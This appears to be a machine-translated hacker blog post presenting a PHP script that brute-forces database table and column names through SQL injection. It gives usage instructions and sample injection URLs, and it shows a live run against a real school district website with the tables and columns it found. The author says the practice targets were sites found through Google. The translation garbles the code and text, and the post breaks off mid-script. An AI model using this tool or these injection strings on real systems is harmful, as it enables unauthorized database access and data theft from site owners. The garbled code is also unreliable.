Author: mika [EST] Source: mika information security team has recently become infatuated with scripts ~~~ After learning PHP, I read some articles on PHP Security, so I found several sites on google to practice. It turns out that it is really hard to guess the table name and column name in php. Does the scanning tool like nbsi have SyntaxHighlighte?
Author: mika [EST]
Information Source: evil baboons information security team
I am infatuated with scripts recently ~~~ After learning PHP, I read some articles on PHP Security, so I found several sites on google to practice.
It turns out that it is really hard to guess the table name and column name in php. Does the scanning tool like nbsi use dictionary or brute force to guess the table name and column name? I am very lazy :-)
I suddenly thought that I had just finished learning PHP? Why don't I apply what I have learned? Php is not only a web scripting language, but also a great command line interpretation language. it is convenient to use it to write scripts. I wrote a php script to guess tables and column names in order to solve these problems in the future. The script is easy to write. the content is as follows:
Echo "Universal Database tables explode exploit V0.1 ";
Echo "Written by Mika [EST]";
// $ Keyword = "Warning ";
$ Keyword = "error ";
Switch ($ argc ){
Case 3:
$ U = "and (select count (*) from MIKA_NAME)> 0 ";
$ Dic = $ argv [2];
Break;
Case 4:
$ U = "and 1 = 1 union select". implode (, range (1, $ argv [2]). "from MIKA_NAME #";
$ Dic = $ argv [3];
Break;
Case 5:
If ($ argv [2]! = "-T ")
Exit ("arguments Error ");
$ U = "and (select count (MIKA_NAME) from $ argv [3])> 0 #";
$ Dic = $ argv [4];
Break;
Case 6:
If ($ argv [2]! = "-T" | $ argv [4] <1)
Exit ("arguments Error ");
If ($ argv [4]> = 2 ){
$ U = "and 1 = 1 union select ". MIKA_NAME .,. implode (, range (2, $ argv [4]). "from $ argv [3] #";
} Else {
$ U = "and 1 = 1 union select MIKA_NAME from $ argv [3] #";
}
$ Dic = $ argv [5];
Break;
Default:
Echo < Usage: $ argv [0] [OPTIONS]
OPTIONS: number ---> to indicate column number of a table during a union query
E. g: $ argv [0] [url] http://www.aaa.com/bbb.asp? Ccc = 56 [/url] 3 mydict.txt
The url will be like:.../bbb. asp? Ccc = 56 and 1 = 2 union select 1, 2, 3 from admin
OPTIONS:-t
[Number] ---> to explode column name of
E. g: $ argv [0] [url] http://www.aaa.com/bbb.asp? Ccc = 56 [/url]-t admin mydict.txt
Attention: if you dont use [options] the program will use default mode to work. you can change it in the source code of this program.
USAGE;
Die;
}
$ Old = $ argv [1];
File_exists ($ dic) or exit ("dic file does not exist! ");
$ Words = file ($ dic );
$ Curl = curl_init ();
Curl_setopt ($ curl, CURLOPT_HEADER, 0 );
Curl_setopt ($ curl, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ curl, CURLOPT_PROXY, "Fig: 8080 ");
Print "[+] Searching What you want ...";
Foreach ($ words as $ word ){
// Print $ word;
If (preg_match ("/^ s $/", $ word )){
// Print "blank ";
Continue;
}
$ Url = str_replace (MIKA_NAME, trim ($ word), $ u );
$ Url = $ old. urlencode ($ url );
// $ Url = $ old. $ url;
Curl_setopt ($ curl, CURLOPT_URL, $ url );
// Print "source url is:". $ url ."";
$ Content = curl_exec ($ curl );
// $ New = $ content;
// Print $ content;
If (preg_match ("/$ keyword/I", $ content) = 0 ){
Print "[*] FOUND:". trim ($ word );
}
Else {print ".";}
}
?>
Let me explain it first: The module used in the program is curl, which is very convenient to obtain webpage content. My php is for windows, so it integrates many modules. However, curl is disabled by default. you need to enable it. The method is very simple. download the latest version of php Green (which is easy to carry without installation) online, and then compress the php in the package. ini-recommended: Copy the ini-recommended file to the system directory (win2 K is the winnt Directory, xp is the windows directory) and change it to php. ini, open it in notepad, and find the following line:
Extension_dir =
Set its value to your own, for example, to load the compressed package to c: php, you need to set it:
Extension_dir = "c: phpext"
Then, locate the following section:
Windows Extensions
; Note that ODBC support is built in, so no dll is needed for it.
; Note that your DLL files are located in the extensions/(PHP 4) ext/(PHP 5)
; Extension folders as well as the separate pecl dll download (PHP 5 ).
; Be sure to appropriately set the extension_dir directive.
; Extension = php_mbstring.dll
; Extension = php_bz2.dll
; Extension = php_curl.dll
; Extension = php_dba.dll
; Extension = php_dbase.dll
; Extension = php_exif.dll
; Extension = php_fdf.dll
; Extension = php_filepro.dll
; Extension = php_gd2.dll
; Extension = php_gettext.dll
; Extension = php_ifx.dll
Have you seen php_curl.dll? Remove the semicolon before it. Then, save the file, and find the two files in the php Directory:
Libeay32.dll
Ssleay32.dll
Copy them to the system32 directory. Is it easy? After setting your PHP script in the environment variable, you can directly use php.exe for resolution in any directory. The steps for installing other modules are similar. I will not talk about the steps below :-)
To put it bluntly, you can use the curl module through the above steps. The program usage is very simple, such as the injection url is like this: http://www.aaa.com/bbb.asp? Ccc000056your dictionary file is recorded in mydict.txt. The procedure is as follows:
Php explode. php http://www.aaa.com/bbb.asp? Ccc = 56 mydict.txt
It should be noted that this program was originally used by myself, so the program did not consider many things. The program is determined based on the content returned by the page. Therefore, you must first obtain it manually. for example, you can:
Http://www.aaa.com/bbb.asp? Ccc = 56 and (select count (*) from mika520)> 0 (on access and mssql)
Or
Http://www.aaa.com/bbb.asp? Ccc = 56 and 1 = 1 union select 1, 2, 4, 5, 6 from mika520 % 23 (on mysql)
The mika520 is a non-existent table, so that you can view the source code after the returned page, find a statement that does not exist on the correct page as a keyword (nbsi and other injection tools use the correct content on the page by default as the keyword for judgment, and I am at the opposite of it :-), then, replace the $ keyword value in line 1 of the program code with your keyword. Take the following Station for example:
Http://www.elkhart.k12.in.us/content.php? Id = 157
Because it is php, you have to use the second method to guess, that is, you need to use a joint query, so first determine whether the injection point does not exist, and then use order by to determine the number of fields, I am judging five fields here. after judging the fields, I can use this program to guess. The result is as follows:
F: scriptsphpmine> php forcetb1.php http://www.elkhart.k12.in.us/content.php? Id
= 157 5 mydict.txt
Universal Database tables explode exploit V0.1
Written by Mika [EST]
[+] Searching What you want...
... [*] FOUND: structure ....................................... ...................
Have you seen it? I found a table. Let's take a look at the field:
F: scriptsphpmine> php forcetb1.php http://www.elkhart.k12.in.us/content.php? Id
= 157-t structure 5 temp.txt
Universal Database tables explode exploit V0.1
Written by Mika [EST]
[+] Searching What you want...
[*] FOUND: division ...... [*] FOUND: id. [*] FOUND: level ......... [*] FOUND: title ....
... [*] FOUND: content... [*] FOUND: parent_id .........
Is it easy? The 5 in the command is the number of fields you guessed using order by. you can change it to the actual number. For an access or mssql database, you only need to remove the parameter of the number of fields (5 in this example. I will not do more demonstrations.
If a problem occurs during the usage process, you can modify the code by yourself. this is very simple :-)
In addition, this program uses the HTTP proxy by default, so you need to modify this line:
Curl_setopt ($ curl, CURLOPT_PROXY, "Fig: 8080 ");
Replace it with your proxy. if you do not need a proxy, comment it out.
In fact, the key is whether your dictionary is powerful enough. you can combine your common dictionaries. For example, the dictionary such as NBSI and crazy ghost is taken, and then a file is formed. However, these two dictionaries may have a lot of duplicates. to save unnecessary guesses, they need to be repeated. I wrote a very simple program in php to help you remove repeated rows, as shown below:
If ($ argc! = 2 ){
Echo < Writte